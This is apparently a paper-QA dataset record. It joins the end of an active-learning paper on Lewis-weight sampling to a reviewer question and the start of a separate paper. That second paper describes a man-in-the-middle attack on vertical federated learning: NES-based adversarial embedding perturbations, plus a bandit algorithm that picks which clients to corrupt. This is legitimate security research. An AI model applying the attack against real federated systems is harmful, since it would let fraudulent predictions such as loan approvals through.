L^p \|A\theta^*\|_p^p\right), $$ where $\theta^* = \arg\min_{\theta} \|f(A\theta) - y\|_p^p$, and $C > 0$ is a constant depending only on $p$. The proof of Theorem 3.5 is deferred to Appendix A. Our analysis also suggests that an $\ell_p$-subspace-embedding can be obtained using $\tilde{O}(d/\epsilon^2)$ samples, removing the $\log n$ factor in (Woodruff & Yasuda, 2023), which may be of independent interest. See Appendix B for discussions. Below we show the guarantee for multiple models, which follows easily as a corollary of Theorem 3.5.
**Corollary 3.6.** Let $A^1, \ldots, A^k \in \mathbb{R}^{n \times d}$ be data matrices and $T = \sum_{i=1}^n \max_{j \in [k]} w_i(A^j)$. Let $f(\cdot)$ be an $L$-Lipschitz function with $f(0) = 0$ and $y \in \mathbb{R}^n$ be the target vector. There exists an algorithm that makes $$ m \sim_p \begin{cases} \epsilon^{-4} T \log(T/\epsilon), & p = 1 \\ \epsilon^{-4} T d^{\max\{\frac{p}{2}-1, 0\}} \log^2 d \log(dT/\epsilon), & p > 0 \text{ and } p \neq 1 \end{cases} \quad (3) $$ queries and outputs solutions $\tilde{\theta}^1, \ldots, \tilde{\theta}^k \in \mathbb{R}^d$ such that (1) holds for all $j \in [k]$ with probability at least 0.9. Proof. Let $t_i = \beta \cdot \max_j w_i(A^j)$; then for any fixed $j$, it holds that $t_i \geq \beta w_i(A^j)$. Also, $m = \sum_i t_i = \beta T$. The sampling probability is $p_i = t_i/m = \max_j w_i(A^j)/T$, which is exactly our sampling scheme in Algorithm 1. Take $$\beta \sim_p \begin{cases} \epsilon^{-4} \log d, & p = 1 \\ \epsilon^{-4} d^{\max\left(\frac{p}{2}-1,0\right)} \log^2 d \log(dT/\epsilon), & p > 0 \text{ and } p \neq 1; \end{cases}$$ then $\beta$ satisfies condition (2) in Theorem 3.5, whence the conclusion follows. Remark. The proof of Corollary 3.6 implies the same guarantee for Algorithm 1 if $\tau$ is set to be the quantity for $m$ in (3). Indeed, the proof of Corollary 3.6 shows that the guarantee holds as soon as the variable $m$ in Algorithm 1 reaches the desired amount in (3), which allows double counting of identical sampled rows; setting $\tau$ to be the same value will only result in a larger number $m$ of samples and the guarantee will persist. 4 EXPERIMENT In this section, we conduct experiments to validate the effectiveness of our method\(^1\). Due to the space limitation, some empirical settings and experimental results are presented in the appendix. Empirical Settings. We incorporate two learning scenarios in our experiments, i.e., fine-tuning and vanilla deep learning. The first one is a common learning scenario for big models. It first pre-trains the model on preliminary tasks. Then, the weights of the network backbone are fixed, and only the prediction heads are fine-tuned on downstream tasks. This setting aligns well with our problem formulation. The second scenario is the default learning scheme, i.e., updating all the parameters of the network with the training dataset. We employ 50 distinct network architectures as the target models. These architectures are published by a recent NAS method OFA (Cai et al., 2019) for accommodating diverse resource-constrained devices, ranging from the NVIDIA Tesla V100 GPU to mobile devices. It aligns well with our problem setting. We conduct experiments on 11 datasets, including 8 classification benchmarks: MNIST (LeCun et al., 1998), Fashion-MNIST (Xiao et al., 2017), Kuzushiji-MNIST (Clanuwat et al., 2018), SVHN (Netzer et al., 2011), EMNIST-letters and EMNIST-digits (Cohen et al., 2017), CIFAR-10 and CIFAR-100 (Krizhevsky, 2009); and 3 regression benchmarks: Biwi (Fanelli et al., 2013), FLD (Sun et al., 2013) and CelebA (Liu et al., 2015). The specifications of the datasets and model configurations are deferred to Appendix E.1. The active learning settings are outlined as follows. • For the scenario of vanilla deep learning, we conduct performance comparisons on the classification benchmarks. Specifically, 3000 instances are sampled uniformly from the training set to initialize the models.
The other compared methods will then select 3000 unlabeled instances from the remaining data points for querying at each iteration, while our method conducts one-shot querying with budgets of 9000 and 15000 instances. The cross-entropy loss is employed in model training. In this scenario, the one-shot methods also query 3000 instances per batch for better comparison. However, these methods select batches independently. • For the fine-tuning scenario, we use the regression datasets. Initially, 500 instances are sampled uniformly from the training set to fine-tune each network. Then, we fix the backbone parameters and actively query the labels among the remaining instances. Afterwards, 50 linear prediction layers with the mean squared error (MSE) loss and the ReLU activation function are trained on the updated labeled dataset, utilizing the features extracted by different network backbones. In this scenario, all the compared methods have the same query budgets of 3000 and 6000 instances. We compare our algorithm with the following methods in the vanilla deep learning scenario. • (iterative) DIAM (Tang & Huang, 2022): The state-of-the-art iterative AL method for multiple target models, which prefers the instances in the joint disagreement regions of multiple models. --- \(^1\)All experiments are conducted on a machine with four GeForce RTX 3090 graphics cards and an Intel Xeon Gold 5317 CPU. The source code is included in the supplementary material for experiment reproducibility. Figure 2: Results of performance comparison on the classification datasets. The error bars indicate the standard deviation of the performances of multiple models. • (iterative) Entropy (Lewis & Catlett, 1994): This strategy selects instances with the highest prediction entropy. We follow the implementation in (Tang & Huang, 2022) to adapt it to multiple models. It queries the instances with the highest mean prediction entropy. • (iterative) QBC (Seung et al., 1992): This strategy selects the instances on which the target models have the most inconsistent predictions. The inconsistency is evaluated by KL divergence. • (one-shot) Coreset (Sener & Savarese, 2018): This strategy selects the most representative instances. We follow the implementation in (Tang & Huang, 2022) to adapt it to multiple models. It solves the coreset problem based on the features extracted by the supernet in OFA. • (one-shot) Random: This strategy selects instances uniformly from the unlabeled pool. In the fine-tuning scenario, fewer existing methods are available. Specifically, we compare our algorithm with the Coreset, Random and QBC methods. Although QBC is usually implemented in an iterative fashion, we employ a large query batch size for it to unify the query settings. Our method selects and reweights the unlabeled instances based on the leverage scores (i.e., \( p = 2 \)) in both scenarios. Note that, in the fine-tuning scenario, our implementations remove the constraint \( E \) in Line 15 of Algorithm 1 to better examine its practicality. In the vanilla deep learning scenario, we use the default training scheme of deep models to replace Line 15 of Algorithm 1. The mean accuracy and the mean MSE are used to evaluate the performances of multiple target models for classification and regression tasks, respectively. **Experiment Results.** We report the performance comparison results in Figure 2 and Figure 3.
In the scenario of vanilla deep learning, we can observe that our one-shot method achieves comparable performances with the iterative AL methods in most cases. This phenomenon indicates that our method can significantly reduce the costs of training multiple deep models while preserving its query-saving ability. QBC is the worst one. We find that it causes a severe class imbalance according to the results in Table 5 in the appendix, which may explain its inferior performances. Coreset is usually worse than Random. Note that the problem settings of Sener & Savarese (2018) and our work are different: there are 50 distinct target networks to be learned in our experiment. The Coreset implementation of Tang & Huang (2022) solves the coreset problem based on the features extracted by the supernet. A drawback of this approach is that the selected instances may not be useful for other models, because the data representations are different. We believe this is the reason why Coreset is less effective than Random in our setting. The Entropy method achieves comparable performances with Random. The reason may also be evidenced by the results in Table 5 in the appendix: their class imbalance ratios are highly consistent, which implies that the mean entropy scores tend to have an extremely small standard deviation. The performances of DIAM are less stable: it is effective on the datasets associated with MNIST, but fails on the others. This deficiency has not been observed in our method. In the scenario of fine-tuning, Figure 3 shows that our approach outperforms the other baselines with different querying budgets in terms of achieving better mean MSE. These results indicate that our method is effective and robust to different query budgets; it can effectively identify the desired number of useful unlabeled instances under diverse representations to learn linear prediction layers. We further examine the running time of different AL methods. The results are reported in Table 1.

| Method | MNIST | F-MNIST | K-MNIST | SVHN | CIFAR-10 | CIFAR-100 | EMNIST-l. | EMNIST-d. |
|---------|-------|---------|---------|------|--------|--------|--------|--------|
| DIAM | 46.643| 47.597 | 46.765 | 52.228| 45.493 | 53.532 | 73.522 | 120.840|
| QBC | 23.937| 24.419 | 24.502 | 26.011| 25.541 | 30.498 | 36.280 | 40.231 |
| Entropy | 24.060| 24.293 | 24.455 | 25.792| 25.173 | 28.655 | 34.291 | 42.719 |
| Our | 5.299 | 5.366 | 5.354 | 5.605 | 5.350 | 5.57 | 9.717 | 12.711 |
| Coreset | 5.200 | 5.201 | 5.285 | 5.466 | 5.450 | 5.745 | 8.984 | 11.043 |
| Random | 4.317 | 4.333 | 4.402 | 4.583 | 4.567 | 4.712 | 7.317 | 8.027 |

Table 1: Comparisons of the running time between our method and the other baselines with a query budget of 15000 instances. The running time includes data querying and model training (GPU hours).

For the one-shot methods Coreset and Random, we report their running time of one-shot querying of 15000 instances. It can be observed that the cost of repeated model training is prohibitive in AL for multiple deep models, demonstrating the advantages of one-shot querying. Among the active selection methods, DIAM is the slowest approach because it selects instances based on the predictions on the unlabeled dataset in the latter half of the training epochs of each target model. Generating the predictions from multiple models could be expensive, particularly with a large unlabeled pool. QBC and Entropy exhibit similar time costs.
Both of them need to feed the unlabeled instances into 50 models to obtain their predictions. In the fine-tuning scenario, all the compared methods conduct one-shot querying and the linear prediction layers are trained with the same computational costs. As a result, the running time of the compared methods is comparable. The results are deferred to Table 6 in the appendix. 5 CONCLUSION In this paper, we propose a one-shot AL algorithm for multiple deep models. The task is formulated as seeking a shared reweighted sampling matrix to approximately solve multiple $\ell_p$-regression problems for neuron models on distinct deep representations. Our approach is to sample and reweight the unlabeled instances based on their maximum Lewis weights across different representations. We establish an upper bound on the number of samples needed by our algorithm to achieve constant-factor approximations for multiple models and general $p$. Our techniques, on the one hand, substantially improve the upper bound on the number of samples of (Gajjar et al., 2023a) in the case of a single model and $p = 2$; on the other hand, they remove the $\log n$ factor in (Woodruff & Yasuda, 2023) for Lewis weight sampling to obtain $\ell_p$-subspace embeddings. Extensive experiments are conducted on 11 benchmarks and 50 deep models. We observe that the sum of the maximum Lewis weights with $p = 2$ grows very slowly as the number of target models increases, providing a direction for interpreting deep representation learning. The performance comparisons show that our algorithm achieves competitive performances with the state-of-the-art AL methods for multiple deep models. ACKNOWLEDGMENTS S.-J. Huang is supported in part by the National Science and Technology Major Project (2020AAA0107000), the Natural Science Foundation of Jiangsu Province of China (BK20222012, BK20211517), and NSFC (62222605). Y. Li is supported in part by the Singapore Ministry of Education (AcRF) Tier 2 grant MOE-T2EP20122-0001 and Tier 1 grant RG75/21. Y.-P. Tang was supported in part by the China Scholarship Council during his visit to Nanyang Technological University, where most of this work was done. REFERENCES Karsten M. Borgwardt, Arthur Gretton, Malte J. Rasch, Hans-Peter Kriegel, Bernhard Schölkopf, and Alexander J. Smola. Integrating structured biological data by kernel maximum mean discrepancy. In Proceedings of the 14th Annual International Conference on Intelligent Systems for Molecular Biology, pp. 49–57, 2006. J. Bourgain, J. Lindenstrauss, and V. Milman. Approximation of zonoids by zonotopes. Acta Mathematica, 162:73–141, 1989. doi: 10.1007/BF02392835. URL https://doi.org/10.1007/BF02392835. Han Cai, Chuang Gan, Tianzhe Wang, Zhekai Zhang, and Song Han. Once-for-all: Train one network and specialize it for efficient deployment. In Proceedings of the 7th International Conference on Learning Representations, 2019. Rita Chattopadhyay, Zheng Wang, Wei Fan, Ian Davidson, Sethuraman Panchanathan, and Jieping Ye. Batch mode active sampling based on marginal probability distribution matching. In Proceedings of the 18th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 741–749, 2012. Cheng Chen, Yi Li, and Yiming Sun. Online active regression. In Proceedings of the 39th International Conference on Machine Learning, pp. 3320–3335. PMLR, 2022. Xue Chen and Michal Derezinski. Query complexity of least absolute deviation regression via robust uniform convergence. In Proceedings of the 34th Annual Conference on Learning Theory, pp.
1144–1179. PMLR, 2021. Xue Chen and Eric Price. Active regression via linear-sample sparsification. In Proceedings of the 32nd Annual Conference on Learning Theory, pp. 663–695. PMLR, 2019. Tarin Clanuwat, Mikel Bober-Irizar, Asanobu Kitamoto, Alex Lamb, Kazuaki Yamamoto, and David Ha. Deep learning for classical Japanese literature. arXiv preprint arXiv:1812.01718, 2018. Gregory Cohen, Saeed Afshar, Jonathan Tapson, and André van Schaik. EMNIST: an extension of MNIST to handwritten letters. arXiv preprint arXiv:1702.05373, 2017. Michael B. Cohen and Richard Peng. $L_p$ row sampling by Lewis weights. In Proceedings of the 47th Annual ACM Symposium on Theory of Computing, pp. 183–192, 2015. David Cohn, Les Atlas, and Richard Ladner. Improving generalization with active learning. Machine Learning, 15(2):201–221, 1994. Sanjoy Dasgupta and Daniel Hsu. Hierarchical sampling for active learning. In Proceedings of the 25th International Conference on Machine Learning, pp. 208–215, 2008. Lei Deng, Guoqi Li, Song Han, Luping Shi, and Yuan Xie. Model compression and hardware acceleration for neural networks: A comprehensive survey. Proceedings of the IEEE, 108(4):485–532, 2020. Gabriele Fanelli, Matthias Dantone, Juergen Gall, Andrea Fossati, and Luc Van Gool. Random forests for real time 3D face analysis. International Journal of Computer Vision, 101:437–458, 2013.
m52uU0dVbH
How does the proposed E-TS algorithm work compared to the sequential arm elimination proposed in S. Shahrampour, M. Noshad and V. Tarokh, "On Sequential Elimination Algorithms for Best-Arm Identification in Multi-Armed Bandits," IEEE Transactions on Signal Processing, vol. 65, no. 16, pp. 4281-4292, Aug. 2017?
CONSTRUCTING ADVERSARIAL EXAMPLES FOR VERTICAL FEDERATED LEARNING: OPTIMAL CLIENT CORRUPTION THROUGH MULTI-ARMED BANDIT Duanyi Yao, HKUST, [email protected] Songze Li, Southeast University, [email protected] Ye Xue, Shenzhen Research Institute of Big Data, CUHK(SZ), [email protected] Jin Liu, HKUST(GZ), [email protected] ABSTRACT Vertical federated learning (VFL), where each participating client holds a subset of data features, has found numerous applications in finance, healthcare, and IoT systems. However, adversarial attacks, particularly through the injection of adversarial examples (AEs), pose serious challenges to the security of VFL models. In this paper, we investigate such vulnerabilities through developing a novel attack to disrupt the VFL inference process, under a practical scenario where the adversary is able to adaptively corrupt a subset of clients. We formulate the problem of finding optimal attack strategies as an online optimization problem, which is decomposed into an inner problem of adversarial example generation (AEG) and an outer problem of corruption pattern selection (CPS). Specifically, we establish the equivalence between the formulated CPS problem and a multi-armed bandit (MAB) problem, and propose the Thompson sampling with Empirical maximum reward (E-TS) algorithm for the adversary to efficiently identify the optimal subset of clients for corruption. The key idea of E-TS is to introduce an estimation of the expected maximum reward for each arm, which helps to specify a small set of competitive arms, on which the exploration for the optimal arm is performed. This significantly reduces the exploration space, which otherwise can quickly become prohibitively large as the number of clients increases. We analytically characterize the regret bound of E-TS, and empirically demonstrate its capability of efficiently revealing the optimal corruption pattern with the highest attack success rate, under various datasets of popular VFL tasks. 1 INTRODUCTION Federated learning (FL) [Li et al., 2020] is a distributed learning paradigm that enables multiple clients to collaboratively train and utilize a machine learning model without sharing their data. Conventionally, most FL research considers the Horizontal FL (HFL) setting, where clients hold different data samples with the same feature space. In contrast, vertical FL (VFL) tackles the scenarios where clients have identical samples but disjoint feature spaces. A typical VFL model comprises a top model maintained by a server and multiple bottom models, one at each participating client. During the inference process, each client computes the local embedding of data features using its bottom model and uploads it to the server through a communication channel for further prediction. Due to its advantage of incorporating attributes from diverse information sources, VFL has found promising applications in healthcare systems [Poirot et al., 2019], e-commerce platforms [Mammen, 2021], and financial systems [Liu et al., 2022]. VFL inference has also been applied to the Internet of Things (IoT) scenarios (also known as collaborative inference [Liu et al.; Ko et al., 2018]), where sensor data with distinct features are aggregated by a fusion center for further processing. A recent example is to utilize multi-modal image data from sensors for remote sensing image classification [Shi et al., 2022].
Despite its widespread applications, ML models have been shown vulnerable to adversarial examples (AEs) [Goodfellow et al., 2014], which are modified inputs designed to cause model misclassification during the inference. Constructing AEs in the VFL setting presents unique challenges compared to the conventional ML setting. Specifically, we consider a third-party adversary who can access, replay, and manipulate messages on the communication channel between a client and the server. (For simplicity, we use client $x$ to denote the communication channel between client $x$ and the server throughout the paper). However, it can only corrupt a subset of clients due to resource constraints, such as computational power and network bandwidth [Lesi et al., 2020; Li and Tang, 2018; Wu et al., 2018]. Also, the server's top model and the other uncorrupted clients' embeddings and models are unknown to the adversary. Under this setting, the adversary aims to generate AEs by adding manipulated perturbations to embeddings in the corrupted clients, such that the attack success rate (ASR) over a sequence of test samples is maximized. Prior works have proposed methods to generate AEs for VFL inference, for a fixed corruption pattern (i.e., the set of corrupted clients remains fixed throughout the attack). In [Pang et al., 2022], a finite difference method was proposed to generate adversarial dominating inputs, by perturbing the features of a fixed corrupted client, to control the inference result, regardless of the feature values of other clients; another work [Qiu et al., 2022] employed zeroth-order optimization (ZOO) to find the optimal perturbation on the uploaded embedding of a malicious client. Meanwhile, these attacks also make assumptions about prior knowledge available to the adversary, e.g., the adversary can obtain a subset of complete test samples in advance. In this paper, we consider an adversary who lacks prior knowledge on test data or VFL models, but can adaptively adjust its corruption pattern based on the effectiveness of the previous attacks, subject to a maximum number of clients that can be corrupted. For a VFL inference process of $T$ rounds, we formulate the attack as an online optimization problem, over $T$ corruption patterns, one for each inference round, and the embedding perturbations for the test samples in each round. To solve the problem, we first decompose it into two sub-problems: the inner adversarial examples generation (AEG) problem and the outer corruption pattern selection (CPS) problem. For the AEG problem with a fixed corruption pattern, we apply the natural evolution strategy (NES) to estimate the gradient for perturbation optimization. For the outer CPS problem, we establish its equivalence with arm selection in a multi-armed bandit (MAB) problem, with the reward being the optimal ASR obtained from the AEG problem. Given the unique challenge that the total number of arms scales combinatorially with the number of clients, we propose a novel method named Thompson sampling with empirical maximum reward (E-TS), enabling the adversary to efficiently identify the optimal corruption pattern. The key idea is to limit the exploration within the competitive set, which is defined using the expected maximum reward of each arm.
Compared with plain Thompson sampling (TS) for the MAB problem [Agrawal and Goyal, 2012], E-TS additionally maintains the empirical maximum reward for each arm, which is utilized to estimate the underlying competitive arms, within which TS is executed to select the corruption pattern. We theoretically characterize a regret bound of $(N - D)O(1) + DO(\log(T))$ for the proposed E-TS algorithm, where $N$ is the number of arms and $D$ is the number of competitive arms. This demonstrates the advantage of E-TS over the plain TS, especially for a small number of competitive arms. We also empirically evaluate the performance of the proposed attack on datasets with four major types of VFL tasks. In all experiments, the proposed attack uniformly dominates all baselines with the fastest convergence to the optimal corruption pattern with the highest ASR. For the proposed attack, we further conduct extensive experiments to evaluate its effectiveness under various combinations of system and design parameters, as well as under common defense strategies against AEs. ## 2 Preliminaries **VFL inference.** A VFL system consists of a central server and $M$ clients. Each client $m \in [M]$ possesses a subset of disjoint features $x_m$ and a corresponding bottom model $f_m$, where $[M]$ denotes the set $\{1, \ldots, M\}$. The central server maintains a top model $f_0$. Given a test sample $X = [x_1, \ldots, x_M]$, VFL inference is carried out in two stages. First, each client $m$ computes a local embedding $h_m = f_m(x_m)$ using its bottom model, and uploads it to the server through a communication channel for querying a label. In the second stage, the server aggregates the embeddings from all clients and computes the predicted result $p = f_0([h_1, \ldots, h_M]) \in \mathbb{R}^c$, which is a probability vector over $c$ classes. The server broadcasts $p$ to all the clients, who then obtain the predicted label $\hat{y}(p)$, where $\hat{y}(\cdot)$ returns the class with the highest probability. To enhance robustness against system impairments, such as dropouts in embedding transmission, the system permits repeated queries for the same test sample, with a maximum limit of $Q$ times. The inference process operates in an online mode, such that test samples are received continuously in a streaming fashion. **Multi-armed bandit.** A multi-armed bandit (MAB) problem consists of $N$ arms. Each arm $k \in [N]$ corresponds to a random reward following an unknown distribution with mean $\mu_k$. The bandit is played for $T$ rounds. In each round $t \in [T]$, one of the $N$ arms, denoted by $k(t)$, is pulled. The pulled arm yields a random reward $r_{k(t)}(t)$ supported in the range $[0, 1]$, which is i.i.d. across repeated plays of the same arm and observed by the player. The player must decide which arm to pull at each round $t$, i.e., $k(t)$, based on the rewards in previous rounds, to maximize the expected cumulative reward at round $T$, expressed as $\mathbb{E}[\sum_{t=1}^{T} \mu_{k(t)}]$, where $\mu_{k(t)} = \mathbb{E}[r_{k(t)}(t)]$. Assuming there exists an optimal arm with the highest mean reward $\mu^*$, the problem is equivalent to minimizing the expected regret $\mathbb{E}[R(T)]$, which is defined as follows: $$\mathbb{E}[R(T)] = \mathbb{E}\left[\sum_{t=1}^{T} (\mu^* - \mu_{k(t)})\right] = \mathbb{E}\left[\sum_{k=1}^{N} n_k(T) \Delta_k\right],$$ where $n_k(T)$ denotes the number of times pulling arm $k$ in $T$ rounds, and $\Delta_k = \mu^* - \mu_k$ denotes the mean reward gap between the optimal arm and arm $k$.
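The two-stage inference procedure can be summarized by the following minimal Python sketch; `bottom_models`, `top_model`, and `X_parts` are placeholders for the clients' bottom models $f_m$, the server's top model $f_0$, and the feature partition of one test sample, not an actual VFL implementation.

```python
import numpy as np

def vfl_inference(bottom_models, top_model, X_parts):
    # Stage 1: each client m computes and uploads h_m = f_m(x_m).
    embeddings = [f_m(x_m) for f_m, x_m in zip(bottom_models, X_parts)]
    # Stage 2: the server aggregates the embeddings, applies f_0, and
    # broadcasts the probability vector p over the c classes.
    p = top_model(np.concatenate(embeddings))
    return p, int(np.argmax(p))  # clients read off the predicted label
```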
### 3 Threat Model **Goal of the adversary.** We consider two types of attacks: targeted attack and untargeted attack. For the targeted attack with some target label $y_v$, the adversary aims to corrupt the samples whose original prediction is not $y_v$, making the top model output $\hat{y} = y_v$. For instance, in a lending application, the adversary might set $y_v$ to "lending" to secure a loan for an unqualified customer. For the untargeted attack with some label $y_u$, the adversary would like to corrupt the samples whose original prediction is $y_u$, making the top model output $\hat{y} \neq y_u$. Note that the conventional untargeted attack [Mahmood et al., 2021] is a special case of the one considered here, when setting $y_u$ as the true label of the attacked samples. **Metric.** The attack's effectiveness is measured by *attack success rate* (ASR), which is defined as $ASR_v^s = \frac{\sum_{i=1}^{s} \mathbb{I}(\hat{y}(p_i) = y_v)}{s}$ and $ASR_u^s = \frac{\sum_{i=1}^{s} \mathbb{I}(\hat{y}(p_i) \neq y_u)}{s}$ for targeted and untargeted attack, respectively, where $s$ is the number of samples to be attacked, $p_i$ is the probability vector of test sample $i$, and $\mathbb{I}(\cdot)$ is the indicator function. **Capability of the adversary.** We consider an adversary as a third party in VFL inference, who can access, replay, and manipulate messages on the communication channel between two endpoints. This scenario stems from a man-in-the-middle (MITM) attack [Conti et al., 2016; Wang et al., 2020], e.g., Mallory can open letters sent from Bob to Alice and change or resend their contents before handing over the letter to Alice. In VFL inference, a communication channel is established between each client and the server, through which embeddings and predictions are exchanged. The adversary can choose to corrupt any specific channel, e.g., client 1 (for simplicity, we use client $x$ to denote the communication channel between client $x$ and the server). However, due to resource constraints like computational power and network bandwidth (see, e.g., Lesi et al., 2020; Wang et al., 2016; Wu et al., 2018), the adversary can corrupt at most $C \leq M$ clients. Formally, for a test sample $i$, the adversary can perturb the embeddings of up to $C$ clients, denoted as $h_{i,a}$ with $|h_{i,a}| \leq C$, to obtain $\tilde{h}_{i,a}$ such that $\|\tilde{h}_{i,a} - h_{i,a}\|_\infty \leq \beta(ub_i - lb_i)$, where $ub_i$ and $lb_i$ represent the maximum and minimum values of the elements in $h_{i,a}$ respectively, and $\beta \in [0, 1]$ is the perturbation budget of some simple magnitude-based anomaly detector. **Adaptive corruption.** In the context of online inference, we focus on a class of powerful adversaries capable of adaptively adjusting their corruption patterns. In each attack round, the adversary perturbs the embeddings in the corrupted clients for a batch of test samples. In subsequent attack rounds, the sets of corrupted clients can be adjusted subject to the constraint $C$, exploiting feedback on attack performance from previous rounds. ### 4 Problem Definition The attack proceeds in $T$ rounds. In each attack round $t \in [T]$, the adversary seeks to perturb a batch of $B^t$ test samples following a corruption pattern $C^t = \{a_1, \ldots, a_C\}$, where $a_j, j \in [C]$, denotes the index of a corrupted client.
More precisely, given the embeddings of a test sample \( i \in [B^t] \), denoted as \( h_i^t = [h_{i,1}^t, \ldots, h_{i,M}^t] \), where \( h_{i,m}^t, m \in [M] \), represents the embedding vector of client \( m \), we partition \( h_i^t \) into the adversarial part \( h_{i,a}^t = [h_{i,a_1}^t, \ldots, h_{i,a_C}^t] \) and the benign part \( h_{i,b}^t \), according to \( C^t \). The adversary crafts a perturbation \( \eta_i^t = [\eta_{i,a_1}^t, \ldots, \eta_{i,a_C}^t] \) with \( \| \eta_i^t \|_\infty \leq \beta (ub_i - lb_i) \), and adds it to \( h_{i,a}^t \) to obtain an adversarial embedding \( \tilde{h}_{i,a}^t = h_{i,a}^t + \eta_i^t \), before submitting it to the server. Upon receiving \( \tilde{h}_{i,a}^t \) and \( h_{i,b}^t \), the server returns the prediction \( f_0(\tilde{h}_{i,a}^t; h_{i,b}^t) \) to all clients. After collecting all predictions of the \( B^t \) adversarial embeddings, the adversary computes the ASR, i.e.,

\[ A(\{\eta_i^t\}_{i=1}^{B^t}, C^t; B^t) = \frac{\sum_{i=1}^{B^t} \mathbb{I}(\hat{y}(f_0(\tilde{h}_{i,a}^t; h_{i,b}^t)) = y_v)}{B^t} \]

for the targeted attack with target label \( y_v \), or

\[ A(\{\eta_i^t\}_{i=1}^{B^t}, C^t; B^t) = \frac{\sum_{i=1}^{B^t} \mathbb{I}(\hat{y}(f_0(\tilde{h}_{i,a}^t; h_{i,b}^t)) \neq y_u)}{B^t} \]

for the untargeted attack with label \( y_u \). The adversary aims to find the optimal set of corruption patterns \( \{C^t\}_{t=1}^T \), together with the optimal set of perturbations \( \{\eta_i^t\}_{i=1}^{B^t} \) for each sample \( i \in [B^t] \) in each attack round \( t \in [T] \), thus maximizing the expected cumulative ASR over \( T \) attack rounds. We formulate this attack as the online optimization problem in (2). Note that the expectation \( \mathbb{E}_t \) is taken over the randomness within the \( t \)-th attack round, and the expectation \( \mathbb{E} \) is taken over the randomness of all \( T \) rounds.

\[ \max_{\{C^t\}_{t=1}^T} \frac{\mathbb{E}\left[\sum_{t=1}^{T} \mathbb{E}_t \left[ \max_{\{\eta_i^t\}_{i=1}^{B^t}} A(\{\eta_i^t\}_{i=1}^{B^t}, C^t; B^t) \right] \right]}{\sum_{t=1}^{T} B^t} \] (2)

subject to \( |C^t| = C \), \( \| \eta_i^t \|_\infty \leq \beta (ub_i - lb_i) \), \( \forall t \in [T] \).

## 5 METHODOLOGY

To solve Problem (2), we decompose it into an inner problem of adversarial example generation (AEG) and an outer problem of corruption pattern selection (CPS). We first specify the inner problem of AEG. At each round \( t \in [T] \), with a fixed corruption pattern \( C^t \), for each test sample \( i \in [B^t] \), the adversary intends to find the optimal perturbation \( \eta_i^t \) that minimizes some loss function, as shown in (3). We consider the loss function \( L(\eta_i^t; C^t) = l(f_0(\tilde{h}_{i,a}^t; h_{i,b}^t), y_v) \) for the targeted attack with target label \( y_v \), and \( L(\eta_i^t; C^t) = -l(f_0(\tilde{h}_{i,a}^t; h_{i,b}^t), y_u) \) for the untargeted attack with label \( y_u \), where \( l(\cdot) \) denotes the loss metric, such as cross-entropy or margin loss.

Inner problem (AEG):

\[ \min_{\eta_i^t} L(\eta_i^t; C^t), \quad \text{s.t. } \| \eta_i^t \|_\infty \leq \beta (ub_i - lb_i), \forall i \in [B^t]. \] (3)

Then, we obtain the ASR over the \( B^t \) test samples, i.e., \( A^*(C^t; B^t) = A(\{\eta_i^{t*}\}_{i=1}^{B^t}, C^t; B^t) \), computed using the optimal perturbations \( \eta_i^{t*}, i \in [B^t] \), from solving the AEG problem.
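The feasibility constraint in (3) amounts to clipping each perturbation into a box whose width scales with the embedding's value range. A minimal sketch of this projection step (names and shapes assumed for illustration):

```python
import numpy as np

def project_linf(eta, h_a, beta):
    """Project eta back into the box ||eta||_inf <= beta * (ub - lb), where
    ub/lb are the max/min elements of the clean adversarial-part embedding h_a."""
    eps = beta * (h_a.max() - h_a.min())
    return np.clip(eta, -eps, eps)

h_a = np.random.randn(3, 16)            # embeddings of the C corrupted clients
eta = np.random.randn(*h_a.shape)       # candidate perturbation
eta = project_linf(eta, h_a, beta=0.3)  # feasible perturbation
h_tilde = h_a + eta                     # adversarial embedding sent to the server
```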
As such, the outer problem of CPS can be cast as

Outer problem (CPS):

\[ \min_{\{C^t\}_{t=1}^T} \frac{\mathbb{E}\left[\sum_{t=1}^{T} (\alpha^* - \mathbb{E}_t [A^*(C^t; B^t)]) \right]}{\sum_{t=1}^{T} B^t} \] (4)

subject to \( |C^t| = C \), \( \forall t \in [T] \),

where \( \alpha^* \) is any positive constant. The inherent randomness of \( A^*(C^t; B^t) \) for a fixed \( C^t \) arises from the random test samples and the random noises in the AE generation process.

### 5.1 AE generation by solving the AEG problem

To address the box-constrained inner AEG problem (3), one might initially consider employing the projected gradient descent (PGD) method (Madry et al., 2017). However, in our setting, the adversary can only access the value of the loss function and cannot directly obtain the gradient, necessitating the use of zeroth-order optimization (ZOO) methods. A ZOO method iteratively seeks the optimal variable: each iteration typically commences with an estimation of the current variable's gradient, followed by a gradient-descent-based variable update. NES (Ilyas et al., 2018), a type of ZOO method, not only estimates the gradient but also requires fewer queries than conventional finite-difference methods. NES is thus especially well-suited for addressing the AEG problem (3) in the VFL setting, where query times are inherently limited.

In the process of AE generation using NES, the adversary samples \( n \) Gaussian noises \( \delta_j \sim N(0, I), j \in [n] \), and adds them to the current variable \( \eta_i^t \), with some scaling parameter \( \sigma > 0 \). Then, the gradient estimation is given by

\[ \nabla_{\eta_i^t} L(\eta_i^t; C^t) \approx \frac{1}{\sigma n} \sum_{j=1}^{n} \delta_j L(\eta_i^t + \sigma \delta_j; C^t). \]

After obtaining the gradient estimates, the adversary can update \( \eta_i^t \) in a PGD manner. The details of the AE generation process are provided in Algorithm 2 in Appendix A. Note that the number of queries for each test sample is limited to \( Q \); therefore, the adversary can update the crafted perturbation at most \( \lfloor \frac{Q}{n} \rfloor \) times for each sample.

**Algorithm 1** E-TS for CPS

1: **Initialization**: \( \forall k \in [N], \hat{\mu}_k = 0, \hat{\sigma}_k = 1, n_k = 0, r_{k}^{\text{max}} = 0, \hat{\varphi}_k = 0. \)
2: **for** \( t = 1, 2, \ldots, T \) **do**
3: **if** \( t > t_0 \) **then**
4: Select fully explored arms to construct the set \( \mathcal{S}^t = \{ k \in [N] : n_k \geq \frac{(t-1)}{N} \}. \)
5: Select the empirical best arm \( k^{\text{emp}}(t) = \arg\max_{k \in \mathcal{S}^t} \hat{\mu}_k. \)
6: Initialize \( \mathcal{E}^t = \emptyset \); add each arm \( k \in [N] \) satisfying \( \hat{\varphi}_k \geq \hat{\mu}_{k^{\text{emp}}(t)} \) to \( \mathcal{E}^t \).
7: **else**
8: Initialize the set \( \mathcal{E}^t = [N]. \)
9: **end if**
10: \( \forall k \in \mathcal{E}^t \): Sample \( \theta_k \sim N(\hat{\mu}_k, \hat{\sigma}_k). \)
